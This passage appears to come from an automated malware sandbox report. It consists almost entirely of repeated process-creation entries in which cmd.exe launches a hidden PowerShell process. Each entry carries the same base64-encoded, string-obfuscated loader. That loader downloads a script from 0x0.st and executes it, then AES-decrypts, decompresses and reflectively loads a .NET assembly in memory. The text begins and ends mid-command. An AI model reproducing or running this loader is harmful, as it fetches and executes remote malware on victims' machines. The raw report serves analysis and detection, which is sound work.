5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 